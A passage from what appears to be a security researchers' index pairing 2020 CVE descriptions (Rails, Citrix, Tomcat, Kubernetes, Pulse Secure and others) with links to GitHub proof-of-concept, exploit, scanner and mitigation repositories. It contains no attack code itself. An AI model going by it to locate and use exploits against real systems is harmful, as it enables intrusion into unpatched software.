code. + + +- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development) + +### CVE-2020-8103 (2020-06-05) + +A vulnerability in the improper handling of symbolic links in Bitdefender Antivirus Free can allow an unprivileged user to substitute a quarantined file, and restore it to a privileged location. This issue affects Bitdefender Antivirus Free versions prior to 1.0.17.178. + + +- [RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP](https://github.com/RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP) + +### CVE-2020-8163 (2020-07-02) + +The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE. + + +- [lucasallan/CVE-2020-8163](https://github.com/lucasallan/CVE-2020-8163) +- [h4ms1k/CVE-2020-8163](https://github.com/h4ms1k/CVE-2020-8163) +- [RedPhantomRoot/CVE-2020-8163](https://github.com/RedPhantomRoot/CVE-2020-8163) + +### CVE-2020-8165 (2020-06-19) + +A deserialization of untrusted data vulnernerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE. + + +- [masahiro331/CVE-2020-8165](https://github.com/masahiro331/CVE-2020-8165) +- [umiterkol/CVE-2020-8165--Auto-Shell](https://github.com/umiterkol/CVE-2020-8165--Auto-Shell) +- [taipansec/CVE-2020-8165](https://github.com/taipansec/CVE-2020-8165) +- [hybryx/CVE-2020-8165](https://github.com/hybryx/CVE-2020-8165) +- [AssassinUKG/CVE-2020-8165](https://github.com/AssassinUKG/CVE-2020-8165) +- [progfay/CVE-2020-8165](https://github.com/progfay/CVE-2020-8165) +- [danielklim/cve-2020-8165-demo](https://github.com/danielklim/cve-2020-8165-demo) + +### CVE-2020-8175 (2020-07-24) + +Uncontrolled resource consumption in `jpeg-js` before 0.4.0 may allow attacker to launch denial of service attacks using specially a crafted JPEG image. + + +- [knokbak/get-pixels-updated](https://github.com/knokbak/get-pixels-updated) +- [knokbak/save-pixels-updated](https://github.com/knokbak/save-pixels-updated) + +### CVE-2020-8193 (2020-07-10) + +Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. + + +- [jas502n/CVE-2020-8193](https://github.com/jas502n/CVE-2020-8193) +- [Airboi/Citrix-ADC-RCE-CVE-2020-8193](https://github.com/Airboi/Citrix-ADC-RCE-CVE-2020-8193) +- [Zeop-CyberSec/citrix_adc_netscaler_lfi](https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi) +- [PR3R00T/CVE-2020-8193-Citrix-Scanner](https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner) +- [ctlyz123/CVE-2020-8193](https://github.com/ctlyz123/CVE-2020-8193) + +### CVE-2020-8209 (2020-08-17) + +Improper access control in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files. + + +- [B1anda0/CVE-2020-8209](https://github.com/B1anda0/CVE-2020-8209) + +### CVE-2020-8218 (2020-07-30) + +A code injection vulnerability exists in Pulse Connect Secure <9.1R8 that allows an attacker to crafted a URI to perform an arbitrary code execution via the admin web interface. + + +- [withdk/pulse-gosecure-rce-poc](https://github.com/withdk/pulse-gosecure-rce-poc) + +### CVE-2020-8241 (2020-10-28) + +A vulnerability in the Pulse Secure Desktop Client < 9.1R9 could allow the attacker to perform a MITM Attack if end users are convinced to connect to a malicious server. + + +- [withdk/pulse-secure-vpn-mitm-research](https://github.com/withdk/pulse-secure-vpn-mitm-research) + +### CVE-2020-8248 (2020-10-28) + +A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege. + + +- [mbadanoiu/CVE-2020-8248](https://github.com/mbadanoiu/CVE-2020-8248) + +### CVE-2020-8249 (2020-10-28) + +A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to perform buffer overflow. + + +- [mbadanoiu/CVE-2020-8249](https://github.com/mbadanoiu/CVE-2020-8249) + +### CVE-2020-8250 (2020-10-28) + +A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege. + + +- [mbadanoiu/CVE-2020-8250](https://github.com/mbadanoiu/CVE-2020-8250) + +### CVE-2020-8254 (2020-10-28) + +A vulnerability in the Pulse Secure Desktop Client < 9.1R9 has Remote Code Execution (RCE) if users can be convinced to connect to a malicious server. This vulnerability only affects Windows PDC.To improve the security of connections between Pulse clients and Pulse Connect Secure, see below recommendation(s):Disable Dynamic certificate trust for PDC. + + +- [mbadanoiu/CVE-2020-8254](https://github.com/mbadanoiu/CVE-2020-8254) + +### CVE-2020-8277 (2020-11-19) + +A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions < 15.2.1, < 14.15.1, and < 12.19.1 by getting the application to resolve a DNS record with a larger number of responses. This is fixed in 15.2.1, 14.15.1, and 12.19.1. + + +- [masahiro331/CVE-2020-8277](https://github.com/masahiro331/CVE-2020-8277) +- [AndrewIjano/CVE-2020-8277](https://github.com/AndrewIjano/CVE-2020-8277) + +### CVE-2020-8287 (2021-01-06) + +Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 allow two copies of a header field in an HTTP request (for example, two Transfer-Encoding header fields). In this case, Node.js identifies the first header field and ignores the second. This can lead to HTTP Request Smuggling. + + +- [progfay/nodejs-http-transfer-encoding-smuggling-poc](https://github.com/progfay/nodejs-http-transfer-encoding-smuggling-poc) + +### CVE-2020-8289 (2020-12-27) + +Backblaze for Windows before 7.0.1.433 and Backblaze for macOS before 7.0.1.434 suffer from improper certificate validation in `bztransmit` helper due to hardcoded whitelist of strings in URLs where validation is disabled leading to possible remote code execution via client update functionality. + + +- [geffner/CVE-2020-8289](https://github.com/geffner/CVE-2020-8289) + +### CVE-2020-8290 (2020-12-27) + +Backblaze for Windows and Backblaze for macOS before 7.0.0.439 suffer from improper privilege management in `bztransmit` helper due to lack of permission handling and validation before creation of client update directories allowing for local escalation of privilege via rogue client update binary. + + +- [geffner/CVE-2020-8290](https://github.com/geffner/CVE-2020-8290) + +### CVE-2020-8300 (2021-06-16) + +Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SAML SP or a SAML IdP for this to be possible. + + +- [stuartcarroll/CitrixADC-CVE-2020-8300](https://github.com/stuartcarroll/CitrixADC-CVE-2020-8300) + +### CVE-2020-8321 (2020-06-09) + +A potential vulnerability in the SMI callback function used in the System Lock Preinstallation driver in some Lenovo Notebook and ThinkStation models may allow arbitrary code execution. + + +- [SatheeshGitHub575/external_curl_CVE-2020-8321](https://github.com/SatheeshGitHub575/external_curl_CVE-2020-8321) + +### CVE-2020-8417 (2020-01-28) + +The Code Snippets plugin before 2.14.0 for WordPress allows CSRF because of the lack of a Referer check on the import menu. + + +- [vulncrate/wp-codesnippets-cve-2020-8417](https://github.com/vulncrate/wp-codesnippets-cve-2020-8417) +- [waleweewe12/CVE-2020-8417](https://github.com/waleweewe12/CVE-2020-8417) +- [Rapidsafeguard/codesnippets_CVE-2020-8417](https://github.com/Rapidsafeguard/codesnippets_CVE-2020-8417) +- [Vulnmachines/WordPress_CVE-2020-8417](https://github.com/Vulnmachines/WordPress_CVE-2020-8417) + +### CVE-2020-8423 (2020-04-02) + +A buffer overflow in the httpd daemon on TP-Link TL-WR841N V10 (firmware version 3.16.9) devices allows an authenticated remote attacker to execute arbitrary code via a GET request to the page for the configuration of the Wi-Fi network. + + +- [lnversed/CVE-2020-8423](https://github.com/lnversed/CVE-2020-8423) + +### CVE-2020-8437 (2020-03-02) + +The bencoding parser in BitTorrent uTorrent through 3.5.5 (build 45505) misparses nested bencoded dictionaries, which allows a remote attacker to cause a denial of service. + + +- [mavlevin/uTorrent-CVE-2020-8437](https://github.com/mavlevin/uTorrent-CVE-2020-8437) + +### CVE-2020-8515 (2020-02-01) + +DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. + + +- [imjdl/CVE-2020-8515-PoC](https://github.com/imjdl/CVE-2020-8515-PoC) +- [truerandom/nmap_draytek_rce](https://github.com/truerandom/nmap_draytek_rce) +- [darrenmartyn/CVE-2020-8515](https://github.com/darrenmartyn/CVE-2020-8515) + +### CVE-2020-8554 (2021-01-21) + +Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.externalIPs field, to intercept traffic to that IP address. Additionally, an attacker who is able to patch the status (which is considered a privileged operation and should not typically be granted to users) of a LoadBalancer service can set the status.loadBalancer.ingress.ip to similar effect. + + +- [rancher/externalip-webhook](https://github.com/rancher/externalip-webhook) +- [jrmurray000/CVE-2020-8554](https://github.com/jrmurray000/CVE-2020-8554) +- [twistlock/k8s-cve-2020-8554-mitigations](https://github.com/twistlock/k8s-cve-2020-8554-mitigations) +- [Dviejopomata/CVE-2020-8554](https://github.com/Dviejopomata/CVE-2020-8554) +- [alebedev87/gatekeeper-cve-2020-8554](https://github.com/alebedev87/gatekeeper-cve-2020-8554) + +### CVE-2020-8558 (2020-07-27) + +The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachable only by other processes on the same host, but due to this defeect, could be reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service. + + +- [tabbysable/POC-2020-8558](https://github.com/tabbysable/POC-2020-8558) +- [rhysemmas/martian-packets](https://github.com/rhysemmas/martian-packets) + +### CVE-2020-8559 (2020-07-22) + +The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise. + + +- [tabbysable/POC-2020-8559](https://github.com/tabbysable/POC-2020-8559) +- [tdwyer/CVE-2020-8559](https://github.com/tdwyer/CVE-2020-8559) + +### CVE-2020-8597 (2020-02-03) + +eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions. + + +- [dointisme/CVE-2020-8597](https://github.com/dointisme/CVE-2020-8597) +- [WinMin/CVE-2020-8597](https://github.com/WinMin/CVE-2020-8597) +- [Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-](https://github.com/Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-) +- [lakwsh/CVE-2020-8597](https://github.com/lakwsh/CVE-2020-8597) + +### CVE-2020-8617 (2020-05-19) + +Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results. + + +- [knqyf263/CVE-2020-8617](https://github.com/knqyf263/CVE-2020-8617) +- [gothburz/cve-2020-8617](https://github.com/gothburz/cve-2020-8617) + +### CVE-2020-8635 (2020-03-06) + +Wing FTP Server v6.2.3 for Linux, macOS, and Solaris sets insecure permissions on installation directories and configuration files. This allows local users to arbitrarily create FTP users with full privileges, and escalate privileges within the operating system by modifying system files. + + +- [Al1ex/CVE-2020-8635](https://github.com/Al1ex/CVE-2020-8635) + +### CVE-2020-8637 (2020-04-03) + +A SQL injection vulnerability in TestLink 1.9.20 allows attackers to execute arbitrary SQL commands in dragdroptreenodes.php via the node_id parameter. + + +- [DXY0411/CVE-2020-8637](https://github.com/DXY0411/CVE-2020-8637) + +### CVE-2020-8644 (2020-02-05) + +PlaySMS before 1.4.3 does not sanitize inputs from a malicious string. + + +- [H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4](https://github.com/H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4) + +### CVE-2020-8809 (2020-02-25) + +Gurux GXDLMS Director prior to 8.5.1905.1301 downloads updates to add-ins and OBIS code over an unencrypted HTTP connection. A man-in-the-middle attacker can prompt the user to download updates by modifying the contents of gurux.fi/obis/files.xml and gurux.fi/updates/updates.xml. Then, the attacker can modify the contents of downloaded files. In the case of add-ins (if the user is using those), this will lead to code execution. In case of OBIS codes (which the user is always using as they are needed to communicate with the energy meters), this can lead to code execution when combined with CVE-2020-8810. + + +- [seqred-s-a/gxdlmsdirector-cve](https://github.com/seqred-s-a/gxdlmsdirector-cve) + +### CVE-2020-8813 (2020-02-22) + +graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege. + + +- [mhaskar/CVE-2020-8813](https://github.com/mhaskar/CVE-2020-8813) +- [0xm4ud/Cacti-CVE-2020-8813](https://github.com/0xm4ud/Cacti-CVE-2020-8813) +- [hexcowboy/CVE-2020-8813](https://github.com/hexcowboy/CVE-2020-8813) +- [p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime](https://github.com/p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime) + +### CVE-2020-8816 (2020-05-29) + +Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease. + + +- [AndreyRainchik/CVE-2020-8816](https://github.com/AndreyRainchik/CVE-2020-8816) +- [martinsohn/CVE-2020-8816](https://github.com/martinsohn/CVE-2020-8816) +- [cybervaca/CVE-2020-8816](https://github.com/cybervaca/CVE-2020-8816) +- [team0se7en/CVE-2020-8816](https://github.com/team0se7en/CVE-2020-8816) + +### CVE-2020-8825 (2020-02-10) + +index.php?p=/dashboard/settings/branding in Vanilla 2.6.3 allows stored XSS. + + +- [hacky1997/CVE-2020-8825](https://github.com/hacky1997/CVE-2020-8825) + +### CVE-2020-8835 (2020-04-02) + +In the Linux kernel 5.5.0 and newer, the bpf verifier (kernel/bpf/verifier.c) did not properly restrict the register bounds for 32-bit operations, leading to out-of-bounds reads and writes in kernel memory. The vulnerability also affects the Linux 5.4 stable series, starting with v5.4.7, as the introducing commit was backported to that branch. This vulnerability was fixed in 5.6.1, 5.5.14, and 5.4.29. (issue is aka ZDI-CAN-10780) + + +- [Prabhashaka/Exploitation-CVE-2020-8835](https://github.com/Prabhashaka/Exploitation-CVE-2020-8835) +- [snappyJack/Rick_write_exp_CVE-2020-8835](https://github.com/snappyJack/Rick_write_exp_CVE-2020-8835) +- [zilong3033/CVE-2020-8835](https://github.com/zilong3033/CVE-2020-8835) +- [SplendidSky/CVE-2020-8835](https://github.com/SplendidSky/CVE-2020-8835) +- [digamma-ai/CVE-2020-8835-verification](https://github.com/digamma-ai/CVE-2020-8835-verification) + +### CVE-2020-8840 (2020-02-10) + +FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter. + + +- [jas502n/jackson-CVE-2020-8840](https://github.com/jas502n/jackson-CVE-2020-8840) +- [Wfzsec/FastJson1.2.62-RCE](https://github.com/Wfzsec/FastJson1.2.62-RCE) +- [fairyming/CVE-2020-8840](https://github.com/fairyming/CVE-2020-8840) +- [Blyth0He/CVE-2020-8840](https://github.com/Blyth0He/CVE-2020-8840) +- [Veraxy00/CVE-2020-8840](https://github.com/Veraxy00/CVE-2020-8840) +- [dpredrag/CVE-2020-8840](https://github.com/dpredrag/CVE-2020-8840) + +### CVE-2020-8888 +- [SnipJoe/CVE-2020-8888](https://github.com/SnipJoe/CVE-2020-8888) + +### CVE-2020-8950 (2020-02-12) + +The AUEPLauncher service in Radeon AMD User Experience Program Launcher through 1.0.0.1 on Windows allows elevation of privilege by placing a crafted file in %PROGRAMDATA%\AMD\PPC\upload and then creating a symbolic link in %PROGRAMDATA%\AMD\PPC\temp that points to an arbitrary folder with an arbitrary file name. + + +- [sailay1996/amd_eop_poc](https://github.com/sailay1996/amd_eop_poc) + +### CVE-2020-8958 (2020-07-15) + +Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the boaform/admin/formPing Dest IP Address field. + + +- [qurbat/CVE-2020-8958](https://github.com/qurbat/CVE-2020-8958) +- [Asjidkalam/CVE-2020-8958](https://github.com/Asjidkalam/CVE-2020-8958) + +### CVE-2020-9006 (2020-02-17) + +The Popup Builder plugin 2.2.8 through 2.6.7.6 for WordPress is vulnerable to SQL injection (in the sgImportPopups function in sg_popup_ajax.php) via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on Wordpress instances. (This issue has been fixed in the 3.x branch of popup-builder.) + + +- [s3rgeym/cve-2020-9006](https://github.com/s3rgeym/cve-2020-9006) + +### CVE-2020-9008 (2020-02-25) + +Stored Cross-site scripting (XSS) vulnerability in Blackboard Learn/PeopleTool v9.1 allows users to inject arbitrary web script via the Tile widget in the People Tool profile editor. + + +- [kyletimmermans/blackboard-xss](https://github.com/kyletimmermans/blackboard-xss) + +### CVE-2020-9038 (2020-02-17) + +Joplin through 1.0.184 allows Arbitrary File Read via XSS. + + +- [JavierOlmedo/CVE-2020-9038](https://github.com/JavierOlmedo/CVE-2020-9038) + +### CVE-2020-9047 (2020-06-26) + +A vulnerability exists that could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentially download and run a malicious executable that could allow OS command injection on the system. + + +- [norrismw/CVE-2020-9047](https://github.com/norrismw/CVE-2020-9047) + +### CVE-2020-9054 (2020-03-04) + +Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2 + + +- [darrenmartyn/CVE-2020-9054](https://github.com/darrenmartyn/CVE-2020-9054) + +### CVE-2020-9273 (2020-02-20) + +In ProFTPD 1.3.7, it is possible to corrupt the memory pool by interrupting the data transfer channel. This triggers a use-after-free in alloc_pool in pool.c, and possible remote code execution. + + +- [ptef/CVE-2020-9273](https://github.com/ptef/CVE-2020-9273) + +### CVE-2020-9283 (2020-02-20) + +golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client. + + +- [brompwnie/CVE-2020-9283](https://github.com/brompwnie/CVE-2020-9283) + +### CVE-2020-9289 (2020-06-16) + +Use of a hard-coded cryptographic key to encrypt password data in CLI configuration in FortiManager 6.2.3 and below, FortiAnalyzer 6.2.3 and below may allow an attacker with access to the CLI configuration or the CLI backup file to decrypt the sensitive data, via knowledge of the hard-coded key. + + +- [synacktiv/CVE-2020-9289](https://github.com/synacktiv/CVE-2020-9289) + +### CVE-2020-9332 (2020-06-17) + +ftusbbus2.sys in FabulaTech USB for Remote Desktop through 2020-02-19 allows privilege escalation via crafted IoCtl code related to a USB HID device. + + +- [Sentinel-One/CVE-2020-9332](https://github.com/Sentinel-One/CVE-2020-9332) + +### CVE-2020-9375 (2020-03-25) + +TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allows remote attackers to cause a denial of service via a crafted HTTP Header containing an unexpected Referer field. + + +- [thewhiteh4t/cve-2020-9375](https://github.com/thewhiteh4t/cve-2020-9375) + +### CVE-2020-9376 (2020-07-09) + +D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer + + +- [renatoalencar/dlink-dir610-exploits](https://github.com/renatoalencar/dlink-dir610-exploits) + +### CVE-2020-9380 (2020-03-05) + +IPTV Smarters WEB TV PLAYER through 2020-02-22 allows attackers to execute OS commands by uploading a script. + + +- [migueltarga/CVE-2020-9380](https://github.com/migueltarga/CVE-2020-9380) + +### CVE-2020-9442 (2020-02-28) + +OpenVPN Connect 3.1.0.361 on Windows has Insecure Permissions for %PROGRAMDATA%\OpenVPN Connect\drivers\tap\amd64\win10, which allows local users to gain privileges by copying a malicious drvstore.dll there. + + +- [hessandrew/CVE-2020-9442](https://github.com/hessandrew/CVE-2020-9442) + +### CVE-2020-9460 (2020-04-14) + +Octech Oempro 4.7 through 4.11 allow XSS by an authenticated user. The parameter CampaignName in Campaign.Create is vulnerable. + + +- [g-rubert/CVE-2020-9460](https://github.com/g-rubert/CVE-2020-9460) + +### CVE-2020-9461 (2020-04-14) + +Octech Oempro 4.7 through 4.11 allow stored XSS by an authenticated user. The FolderName parameter of the Media.CreateFolder command is vulnerable. + + +- [g-rubert/CVE-2020-9461](https://github.com/g-rubert/CVE-2020-9461) + +### CVE-2020-9470 (2020-03-07) + +An issue was discovered in Wing FTP Server 6.2.5 before February 2020. Due to insecure permissions when handling session cookies, a local user may view the contents of the session and session_admin directories, which expose active session cookies within the Wing FTP HTTP interface and administration panel. These cookies may be used to hijack user and administrative sessions, including the ability to execute Lua commands as root within the administration panel. + + +- [Al1ex/CVE-2020-9470](https://github.com/Al1ex/CVE-2020-9470) + +### CVE-2020-9472 (2020-03-16) + +Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality. + + +- [john-dooe/CVE-2020-9472](https://github.com/john-dooe/CVE-2020-9472) + +### CVE-2020-9480 (2020-06-23) + +In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc). + + +- [XiaoShaYu617/CVE-2020-9480](https://github.com/XiaoShaYu617/CVE-2020-9480) + +### CVE-2020-9483 (2020-06-30) + +**Resolved** When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. + + +- [shanika04/apache_skywalking](https://github.com/shanika04/apache_skywalking) +- [Neko-chanQwQ/CVE-2020-9483](https://github.com/Neko-chanQwQ/CVE-2020-9483) + +### CVE-2020-9484 (2020-05-20) + +When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. + + +- [threedr3am/tomcat-cluster-session-sync-exp](https://github.com/threedr3am/tomcat-cluster-session-sync-exp) +- [masahiro331/CVE-2020-9484](https://github.com/masahiro331/CVE-2020-9484) +- [seanachao/CVE-2020-9484](https://github.com/seanachao/CVE-2020-9484) +- [IdealDreamLast/CVE-2020-9484](https://github.com/IdealDreamLast/CVE-2020-9484) +- [qerogram/CVE-2020-9484](https://github.com/qerogram/CVE-2020-9484) +- [osamahamad/CVE-2020-9484-Mass-Scan](https://github.com/osamahamad/CVE-2020-9484-Mass-Scan) +- [anjai94/CVE-2020-9484-exploit](https://github.com/anjai94/CVE-2020-9484-exploit) +- [PenTestical/CVE-2020-9484](https://github.com/PenTestical/CVE-2020-9484) +- [DanQMoo/CVE-2020-9484-Scanner](https://github.com/DanQMoo/CVE-2020-9484-Scanner) +- [AssassinUKG/CVE-2020-9484](https://github.com/AssassinUKG/CVE-2020-9484) +- [VICXOR/CVE-2020-9484](https://github.com/VICXOR/CVE-2020-9484) +- [DXY0411/CVE-2020-9484](https://github.com/DXY0411/CVE-2020-9484) +- [RepublicR0K/CVE-2020-9484](https://github.com/RepublicR0K/CVE-2020-9484) +- [ColdFusionX/CVE-2020-9484](https://github.com/ColdFusionX/CVE-2020-9484) +- [d3fudd/CVE-2020-9484_Exploit](https://github.com/d3fudd/CVE-2020-9484_Exploit) +- [0dayCTF/CVE-2020-9484](https://github.com/0dayCTF/CVE-2020-9484) +- [Disturbante/CVE-2020-9484](https://github.com/Disturbante/CVE-2020-9484) +- [savsch/PoC_CVE-2020-9484](https://github.com/savsch/PoC_CVE-2020-9484) + +### CVE-2020-9495 (2020-06-19) + +Apache Archiva login service before 2.2.5 is vulnerable to LDAP injection. A attacker is able to retrieve user attribute data from the connected LDAP server by providing special values to the login form. With certain characters it is possible to modify the LDAP filter used to query the LDAP users. By measuring the response time for the login request, arbitrary attribute data can be retrieved from LDAP user objects. + + +- [ggolawski/CVE-2020-9495](https://github.com/ggolawski/CVE-2020-9495) + +### CVE-2020-9496 (2020-07-15) + +XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03 + + +- [dwisiswant0/CVE-2020-9496](https://github.com/dwisiswant0/CVE-2020-9496) +- [Vulnmachines/apache-ofbiz-CVE-2020-9496](https://github.com/Vulnmachines/apache-ofbiz-CVE-2020-9496) +- [g33xter/CVE-2020-9496](https://github.com/g33xter/CVE-2020-9496) +- [cyber-niz/CVE-2020-9496](https://github.com/cyber-niz/CVE-2020-9496) +- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc) +- [ambalabanov/CVE-2020-9496](https://github.com/ambalabanov/CVE-2020-9496) +- [s4dbrd/CVE-2020-9496](https://github.com/s4dbrd/CVE-2020-9496) +- [Ly0nt4r/CVE-2020-9496](https://github.com/Ly0nt4r/CVE-2020-9496) + +### CVE-2020-9547 (2020-03-02) + +FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). + + +- [fairyming/CVE-2020-9547](https://github.com/fairyming/CVE-2020-9547) + +### CVE-2020-9548 (2020-03-02) + +FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core). + + +- [fairyming/CVE-2020-9548](https://github.com/fairyming/CVE-2020-9548) + +### CVE-2020-9715 (2020-08-19) + +Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have an use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution . + + +- [lsw29475/CVE-2020-9715](https://github.com/lsw29475/CVE-2020-9715) +- [wonjunchun/CVE-2020-9715](https://github.com/wonjunchun/CVE-2020-9715) + +### CVE-2020-9758 (2020-03-09) + +An issue was discovered in chat.php in LiveZilla Live Chat 8.0.1.3 (Helpdesk). A blind JavaScript injection lies in the name parameter. Triggering this can fetch the username and passwords of the helpdesk employees in the URI. This leads to a privilege escalation, from unauthenticated to user-level access, leading to full account takeover. The attack fetches multiple credentials because they are stored in the database (stored XSS). This affects the mobile/chat URI via the lgn and psswrd parameters. + + +- [ari034/CVE-2020-9758](https://github.com/ari034/CVE-2020-9758) + +### CVE-2020-9767 (2020-08-14) + +A vulnerability related to Dynamic-link Library (“DLL”) loading in the Zoom Sharing Service would allow an attacker who had local access to a machine on which the service was running with elevated privileges to elevate their system privileges as well through use of a malicious DLL. Zoom addressed this issue, which only applies to Windows users, in the 5.0.4 client release. + + +- 